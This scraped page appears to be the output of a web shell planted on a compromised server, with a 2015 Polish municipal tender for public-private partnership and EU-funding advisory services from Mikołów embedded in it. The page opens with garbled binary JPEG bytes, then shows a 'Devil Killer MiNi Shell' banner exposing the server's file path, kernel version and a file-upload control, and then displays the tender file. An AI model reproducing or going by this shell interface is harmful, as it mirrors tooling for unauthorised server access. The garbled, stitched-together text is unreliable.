JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151231/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151231/359140-N-2015.html

<p class="kh_header"><b>Mikołów: Usługi przygotowania i realizacji projektów (przedsięwzięć) inwestycyjnych, doradztwo  ekonomiczno- finansowe, techniczne i formalno - prawne</b><br>
<b>Numer ogłoszenia: 359140 - 2015; data zamieszczenia: 31.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mikołów , Rynek 16, 43-190 Mikołów, woj. śląskie, tel. 32 3248500, faks 32 3248400.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi przygotowania i realizacji projektów (przedsięwzięć) inwestycyjnych, doradztwo  ekonomiczno- finansowe, techniczne i formalno - prawne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b></p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi przygotowania i realizacji projektów (przedsięwzięć) inwestycyjnych, doradztwo  ekonomiczno- finansowe, techniczne i formalno - prawne.
	
Zamówienie obejmuje cztery moduły, których realizacja jest pewna:
	
3.1. Przygotowanie i przeprowadzenie postępowania na wybór partnera prywatnego 
Wykonawca przygotuje i przeprowadzi postępowanie na wybór partnera prywatnego dotyczącego realizacji projektu pn. Przebudowa kwartału przyległego do Rynku od strony południowo-zachodniej w formule partnerstwa publiczno-prywatnego (PPP).
Projekt zakłada zaprojektowanie, budowę i utrzymanie budynku biurowo-handlowo-usługowego przy ul. K. Miarki w Mikołowie. 
W ramach nowego kwartału ma powstać przestrzeń biurowo-handlowo-usługowa. Dopuszcza się możliwość powstania części administracyjnej wykorzystywanej na potrzeby Urzędu Miasta Mikołów. 
Rolą partnera prywatnego w tym przedsięwzięciu będzie:
- Zaprojektowanie (w oparciu o istniejącą koncepcję),
- Wybudowanie,
- Sfinansowanie, 
- Eksploatowanie (udostępnianie),
- Zarządzanie,
- Utrzymanie obiektu.
Wykonawca przygotuje i przeprowadzi postępowanie na wybór Partnera Prywatnego dla realizacji przedsięwzięcia,  zgodnie z przepisami ustawy z dnia 19 grudnia 2008 r. o partnerstwie publiczno-prywatnym (Dz. U. z 2015 r. poz. 696 z późn. zm.)., z zastosowaniem trybu określonego w ustawie o koncesji na roboty budowlane lub usługi (Dz. U. z 2015 r. poz. 113) albo dialogu konkurencyjnego z godnie z ustawą Prawo zamówień publicznych o koncesji na roboty budowlane lub usługi (Dz. U. z 2015 r. poz. 113), zgodnie ze wskazaniem Zamawiającego. 
Wykonawca zobowiązany jest postępować zgodnie z metodologią świadczenia usług doradczych, złożoną wraz z ofertą Wykonawcy.
Zakres usługi doradczej:
1)	sporządzenie projektu ogłoszenia o zamówieniu/koncesji, wniosku o dopuszczeniu do udziału w postępowaniu oraz opisu potrzeb i wymagań  Zamawiającego;
2)	sporządzenie projektu  specyfikacji istotnych warunków zamówienia lub opisu warunków koncesji;
3) sporządzenie projektu umowy o partnerstwie publiczno- prywatnym;
4) weryfikacja i ocena złożonych wniosków i ofert pod względem formalnym i merytorycznym, przygotowanie niezbędnej korespondencji i opinii na etapie wyboru partnera prywatnego; przygotowanie rozstrzygnięcia postępowania;
5) udział w negocjacjach z partnerami prywatnymi
6) w razie potrzeby sporządzanie opinii prawnych w zakresie procedury realizacji przedsięwzięcia ppp;
7) aktualizacja analizy ekonomiczno- finansowej przedsięwzięcie w przypadku, gdy w wyniku negocjacji z partnerami prywatnymi nastąpią zmiany założeń realizacji projektu
8) opracowanie innych dokumentów niezbędnych w procedurze wyboru partnera prywatnego.
Termin wykonania zamówienia w zakresie przygotowania i przeprowadzenia postępowania do 12 miesięcy od dnia podpisania umowy. Zamawiający uzna zamówienie za wykonane w chwili zakończenia postępowania na wybór partnera prywatnego. 
	
3.2. Przygotowanie analizy przedrealizacyjnej oraz przygotowanie i przeprowadzenie postępowania na wybór partnera prywatnego  dotyczącego realizacji projektu pn. Termomodernizacja budynków mieszkalnych oraz użyteczności publicznej w Gminie Mikołów w formule partnerstwa publiczno-prywatnego (PPP).
Postępowanie prowadzone będzie zgodnie z przepisami ustawy z dnia 19 grudnia 2008 r. o partnerstwie publiczno-prywatnym (Dz. U. z 2015 r. poz. 696 z późn. zm.)., z zastosowaniem trybu określonego w ustawie o koncesji na roboty budowlane lub usługi (Dz. U. z 2015 r. poz. 113) albo dialogu konkurencyjnego z godnie z ustawą Prawo zamówień publicznych o koncesji na roboty budowlane lub usługi (Dz. U. z 2015 r. poz. 113), zgodnie ze wskazaniem Zamawiającego. 
Wykonawca zobowiązany jest postępować zgodnie z metodologią świadczenia usług doradczych, złożoną wraz z ofertą Wykonawcy.
Zakres usługi doradczej:
1) przygotowanie analizy przedrealizacyjnej przedsięwzięcia;
2) sporządzenie projektu ogłoszenia o zamówieniu/koncesji, wniosku o dopuszczeniu do udziału w postępowaniu oraz opisu potrzeb i wymagań  Zamawiającego;
3) sporządzenie projektu  specyfikacji istotnych warunków zamówienia lub opisu warunków koncesji;
4) sporządzenie projektu umowy o partnerstwie publiczno- prywatnym;
5) weryfikacja i ocena złożonych wniosków i ofert pod względem formalnym i merytorycznym, przygotowanie niezbędnej korespondencji i opinii na etapie wyboru partnera prywatnego; przygotowanie rozstrzygnięcia postępowania;
6) udział w negocjacjach z partnerami prywatnymi
7) w razie potrzeby sporządzanie opinii prawnych w zakresie procedury realizacji przedsięwzięcia ppp;
8) aktualizacja analizy ekonomiczno- finansowej przedsięwzięcie w przypadku, gdy w wyniku negocjacji z partnerami prywatnymi nastąpią zmiany założeń realizacji projektu
9) opracowanie innych dokumentów niezbędnych w procedurze wyboru partnera prywatnego.
Termin wykonania zamówienia w zakresie przygotowania i przeprowadzenia postępowania do 12 miesięcy od dnia podpisania umowy. Zamawiający uzna zamówienie za wykonane w chwili zakończenia postępowania na wybór partnera prywatnego. 
	
3.3. Opracowanie elementów dokumentacji aplikacyjnej
Opracowanie elementów dokumentacji aplikacyjnej dla projektów inwestycyjnych, dla których Zamawiający będzie ubiegał się o do dofinansowanie z Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020. 
	Łączna wartość projektów inwestycyjnych planowanych do realizacji przez Zamawiającego wynosi ok. 60 mln. złotych.
Planowany obszar inwestycji:
- Środowisko
- Rewitalizacja
- Transport
- Kultura
Zamawiający może za zgodą Wykonawcy zlecić opracowanie elementów dokumentacji w innych obszarach.
Wykonawca zobowiązany jest postępować zgodnie z metodologią świadczenia usług doradczych, złożoną wraz z ofertą Wykonawcy.
Zamawiający w okresie trwania umowy  zleci wykonawcy opracowanie dokumentów wyszczególnionych w poniższej tabeli.
1.	Studium wykonalności:	4 sztuki,	3 tygodnie.
2.	Analiza finansowa: 	4 sztuki,	3 tygodnie
	
Opracowana dokumentacja musi być zgodna z wytycznymi Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020. 
Wykonawca przystąpi do opracowania dokumentacji z chwilą otrzymania zlecenia od Zamawiającego określającego zakres opracowania oraz przedmiot projektu. Zamawiający z chwilą przekazania zlecenia przekaże materiały i informacje niezbędne do opracowania elementów dokumentacji aplikacyjnej. Zlecenie zostanie przekazane w formie elektronicznej na adres Wykonawcy wskazany w umowie.
	
3.4. Inne nie określone wyżej doradztwo ekonomiczno - finansowe, techniczne lub formalno - prawne
W ramach realizacji niniejszej umowy Zamawiający zleci Wykonawcy przeprowadzenie analizy, opinii, ekspertyz związanych z realizowanymi lub planowanym do realizacji przedsięwzięciami. Rozliczenie pracy i Wynagrodzenia Wykonawcy odbywać się będzie na podstawie ilości roboczogodzin potrzebnych do opracowania  danego dokumentu.
Potrzebę świadczenia usługi doradztwa Zamawiający zgłosi poprzez przesłanie Wykonawcy zlecenia określającego zakres i uszczegółowienie  zlecenia a także materiały i informacje niezbędne do wykonania zlecenia. Wykonawca w terminie 2 dni roboczych określi szacunkową ilość roboczogodzin potrzebnych do wykonania zlecenia, oraz termin jej wykonania. Wykonawca przystąpi do wykonania zlecenia z chwilą akceptacji przez Zamawiającego szacunkowej ilości roboczogodzin wskazanych przez Wykonawcę. Po wykonaniu zlecenia Wykonawca przekaże Zamawiającemu opracowanie oraz raport zawierający informację na temat faktycznie przepracowanych roboczogodzin w związku z wykonywanym zleceniem. Faktyczna ilość roboczogodzin nie może być wyższa od szacunkowej ilości roboczogodzin wskazanych przez Wykonawcę przed przystąpieniem do wykonania zlecenia.  
Zamawiający w ramach realizacji zamówienia zleci Wykonawcy maksymalnie 50 roboczogodzin, minimalnie 15 roboczogodzin.
	
Zamawiający wyodrębnia jeden moduł (3.5), który uznaje jako opcję. Realizacja tego modułu będzie uzależniona od uwarunkowań 	formalno - prawnych, możliwości skorzystania z finansowania zewnętrznego i innych okoliczności i stanowi dyskrecjonalne uprawnienie Zamawiającego.
	
3.5. Plan mobilności miejskiej 
Opracowanie w formie tekstowej i graficznej Planu Zrównoważonej Mobilności Miejskiej dla Miasta Mikołów, zwany w dalszej części Planem Mobilności z uwzględnieniem podejścia partycypacyjnego.
Termin opracowania Planu Zrównoważonej Mobilności Miejskiej - 4 miesiące od dnia otrzymania zlecenia.
Celem opracowania Planu  Mobilności jest poprawa sytuacji w obszarze transportu poprzez stworzenie efektywnego systemu transportu publicznego w Mieście Mikołów umożliwiającego sprawne poruszanie się podróżujących różnymi środkami transportu. 
Założenia i koncepcje przedstawione w dokumencie mają przyczynić się do poprawy spójności i dostępności komunikacyjnej Miasta Mikołów (ze szczególnym uwzględnieniem dojazdu do miejsc pracy i nauki, stref aktywności gospodarczej,  produkcyjnej, usługowej i handlowej, obszarów rekreacyjno-sportowych, oraz funkcjonowania komunikacji zbiorowej).  
Ponadto Plan Mobilności ma zawierać środki i inicjatywy mające na celu zapewnienie  wszystkim mieszkańcom takich opcji transportowych, które umożliwią dostęp do kluczowych celów podróży i usług oraz przyczynią się do zmniejszenia podróży realizowanych samochodem. Plan Mobilności Miejskiej zostanie opracowany zgodnie z wytycznymi  KE pt. Developing and Implementing a Sustainable Urban Mobility Plan z 2011 r., Komunikatem KE z dnia 17.12.2013r. Wspólne dążenie do osiągnięcia konkurencyjnej i zasobooszczędnej mobilności w miastach oraz dokumentem pn. Wytyczne - opracowanie i wdrożenie Planu Zrównoważonej Mobilności Miejskiej dostępnym na stronie http://www.eltis.org/sites/eltis/files/BUMP_Guidelines_PL.pdf z marca 2014r. 
Rodzaj i zakres prowadzonych badań :
- przeprowadzenie badań ankietowych dot. preferencji wyboru środka transportu maksymalna próba 1500 osób
- przeprowadzenie badań zajętości miejsc parkingowych. 
Badanie należy prowadzić we wtorki, środy i czwartki, każdy punkt pomiary należy przebadać jeden raz w godzinach 6:00 do 20:00. Lokalizację punktów pomiarowych należy ustalić wspólne z Zamawiającym. Minimalna liczba punktów pomiarowych wynosi 5 lokalizacji.
- przeprowadzenie obserwacji ruchu pieszego i rowerowego na głównych ciągach ruchu pieszego/ rowerowego. 
Obserwację należy prowadzić we wtorki, środy i czwartki, w godzinach od 6:00 do 20:00. Lokalizację punktów pomiarowych należy ustalić wspólne z Zamawiającym. Minimalna liczba punktów pomiarowych wynosi 5 lokalizacji. 
Wykonawca przystąpi do opracowania dokumentacji z chwilą otrzymania zlecenia od Zamawiającego określającego zakres opracowania oraz przedmiot projektu. Zamawiający z chwilą przekazania zlecenia przekaże materiały i informacje niezbędne do opracowania dokumentacji aplikacyjnej bądź jej części. Zlecenie zostanie przekazane w formie elektronicznej na adres Wykonawcy wskazany w umowie.
	
Zamawiający wymaga aby do realizacji zamówienia obejmującego moduły 3.1, 3.2, 3.3 i 3.5 Wykonawca zatrudniał na umowę o pracę przynajmniej jednego pracownika niepełnosprawnego. Wykonawca w celu potwierdzenia spełnienia tego warunku w terminie 2 tygodni od dnia zawarcia umowy przekaże Zamawiającemu dokumenty potwierdzające spełnienie przedmiotowego warunku (umowę o pracę oraz orzeczenie o niepełnosprawności)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie: 
a) co najmniej trzy usługi polegające na przygotowaniu i przeprowadzeniu postępowania na wybór partnera prywatnego, w ramach których Wykonawca świadczył usługi doradztwa prawnego, ekonomiczno- finansowego i technicznego. Zamawiający wymaga aby co najmniej dwie usługi zakończyły się zawarciem umowy o partnerstwie publiczno- prywatnym z tego przynajmniej jedna z nich dotyczyła projektu infrastrukturalnego dotyczącego budowy budynku  o wartości nakładów inwestycyjnych min. 9 mln. złotych netto.
Usługi, o których mowa powyżej muszą być wykonane w odniesieniu do postępowania dotyczącego projektu realizowanego na podstawie:
- ustawy z dnia 19.12.2008 r. o partnerstwie publiczno-prywatnym (tekst jednolity Dz. U. z 2015 r. Nr 696) lub
- ustawy z dnia 9.1.2009 r. o koncesji na roboty budowlane lub usługi (tekst jednolity Dz. U. z 2015 r. Nr 113)lub
- ustawy z dnia 27.10.1994 r. o autostradach płatnych oraz o Krajowym Funduszu Drogowym (Dz. U. z 2015 r., poz. 641, z późn. zm.);
b) co najmniej trzy usługi polegające na opracowaniu studiów wykonalności dla projektów infrastrukturalnych o łącznej wartości min. 60 mln złotych, na podstawie  których  uzyskano dofinansowanie ze środków Unii Europejskiej. 
c) co najmniej dwie usługi polegające na opracowaniu Planu Mobilności Miejskiej lub Studium Rozwoju Zrównoważonego Transportu dla Miasta o liczbie ludności min. 35 tys. w ramach których łącznie przeprowadzono badania ankietowe na próbie minimum 1500 osób.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>8.1.4. dysponowanie odpowiednimi osobami zdolnymi do wykonania zamówienia;
a)	Kierownik Zespołu z wykształceniem wyższym technicznym, ekonomicznym lub prawniczym,  posiadającym certyfikat zarządzania projektami PMI lub Prince 2 lub PMP lub inny równoważny tzn. wydany przez akredytowaną jednostkę, po przeprowadzeniu min. 2 dniowego szkolenia i przeprowadzeniu egzaminu, posiadającym łącznie co najmniej 3 lata doświadczenia w kierowaniu/koordynowaniu zespołem lub zespołami ekspertów świadczącymi usługi polegające na doradztwie kompleksowym dla co najmniej 3 projektów infrastrukturalnych o wartości nakładów inwestycyjnych co najmniej 9 mln. PLN netto każdy, z których co najmniej jeden dotyczył budowy budynku i zakończył się zawarciem umowy o partnerstwie publiczno- prywatnym.
Przez doradztwo kompleksowe Zamawiający rozumie doradztwo obejmujące co najmniej 2 rodzaje doradztwa następujących rodzajów doradztwa: doradztwo prawne, doradztwo ekonomiczno-finansowe, doradztwo techniczne. Doradztwo kompleksowe było świadczone na rzecz podmiotu publicznego lub prywatnego w związku z procesem wyboru koncesjonariusza lub partnera prywatnego.
b)	Ekspert ds. prawnych, 	posiadający wykształcenie wyższe prawnicze, który uczestniczył w wykonaniu min. 3 usług, a każda z usług polegała na przygotowaniu dokumentacji postępowania mającego na celu zawarcie umowy o partnerstwie publiczno- prywatnym lub umowy o koncesji dla projektu infrastrukturalnego o wartości nakładów inwestycyjnych co najmniej 9 000 000 PLN netto, z których co najmniej jeden dotyczył budowy budynku  i zakończył się zawarciem umowy o partnerstwie publiczno- prywatnym.

c).	Ekspert ds. ekonomiczno-finansowych, 	posiadający wykształcenie wyższe ekonomiczne i  doświadczenie polegające na przygotowaniu (samodzielnie lub jako członek zespołu) 3 modeli finansowych w postaci arkusza kalkulacyjnego (analiza na co najmniej 10 lat na przyszłość z uwzględnieniem analizy ryzyka i wrażliwości), każdy model dla innego projektu infrastrukturalnego o wartości nakładów inwestycyjnych co najmniej 9 000 000 PLN netto każdy, dla projektów realizowanych w formule partnerstwa publiczno- prywatnego,  który	przynajmniej trzykrotnie uczestniczył w procesie wyboru partnera prywatnego lub koncesjonariusza dla projektów infrastrukturalnych o wartości nakładów inwestycyjnych co najmniej 9 000 000 PLN każdy, z których co najmniej jeden dotyczył budowy budynku  i zakończył się zawarciem umowy o partnerstwie publiczno- prywatnym. 

d)	Ekspert ds. technicznych, posiadający wykształcenie wyższe techniczne i uprawnienia budowlane bez ograniczeń w branży architektonicznej lub konstrukcyjno- budowlanej, który uczestniczył w przygotowaniu co najmniej jednego projektu infrastrukturalnego realizowanego w formule partnerstwa publiczno- prywatnego

e)	Ekspert ds. opracowania dokumentacji aplikacyjnej, posiadający wykształcenie wyższe techniczne, który uczestniczył w opracowaniu co najmniej 3 studiów wykonalności dla projektów infrastrukturalnych o łącznej wartości 60 000 000 PLN na podstawie których uzyskano dofinansowanie ze środków Unii Europejskiej

f).	Ekspert ds. transportu, 	posiadający wykształcenie wyższe, który uczestniczył w realizacji co najmniej dwóch usług polegających na opracowaniu Planu Mobilności Miejskiej lub Studium Rozwoju Zrównoważonego Transportu dla miasta o liczbie ludności min. 35 tys., w ramach których łącznie przeprowadzono badania ankietowe na próbie minimum 1500 osób.
Przez projekt infrastrukturalny Zamawiający rozumie inwestycję polegającą na wykonaniu robót budowlanych w rozumieniu art. 3 pkt 7 ustawy z dnia 07.07.1994 r. Prawo budowlane (Dz. U. z 2010 r., Nr 243, poz. 1623, z późn.zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>a) co najmniej trzy usługi polegające na przygotowaniu i przeprowadzeniu postępowania na wybór partnera prywatnego, w ramach których Wykonawca świadczył usługi doradztwa prawnego, ekonomiczno- finansowego i technicznego. Zamawiający wymaga aby co najmniej dwie usługi zakończyły się zawarciem umowy o partnerstwie publiczno- prywatnym z tego przynajmniej jedna z nich dotyczyła projektu infrastrukturalnego dotyczącego budowy budynku  o wartości nakładów inwestycyjnych min. 9 mln. złotych netto.
Usługi, o których mowa powyżej muszą być wykonane w odniesieniu do postępowania dotyczącego projektu realizowanego na podstawie:
- ustawy z dnia 19.12.2008 r. o partnerstwie publiczno-prywatnym (tekst jednolity Dz. U. z 2015 r. Nr 696) lub
- ustawy z dnia 9.1.2009 r. o koncesji na roboty budowlane lub usługi (tekst jednolity Dz. U. z 2015 r. Nr 113)lub
- ustawy z dnia 27.10.1994 r. o autostradach płatnych oraz o Krajowym Funduszu Drogowym (Dz. U. z 2015 r., poz. 641, z późn. zm.);
b) co najmniej trzy usługi polegające na opracowaniu studiów wykonalności dla projektów infrastrukturalnych o łącznej wartości min. 60 mln złotych, na podstawie  których  uzyskano dofinansowanie ze środków Unii Europejskiej. 
c) co najmniej dwie usługi polegające na opracowaniu Planu Mobilności Miejskiej lub Studium Rozwoju Zrównoważonego Transportu dla Miasta o liczbie ludności min. 35 tys. w ramach których łącznie przeprowadzono badania ankietowe na próbie minimum 1500 osób;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
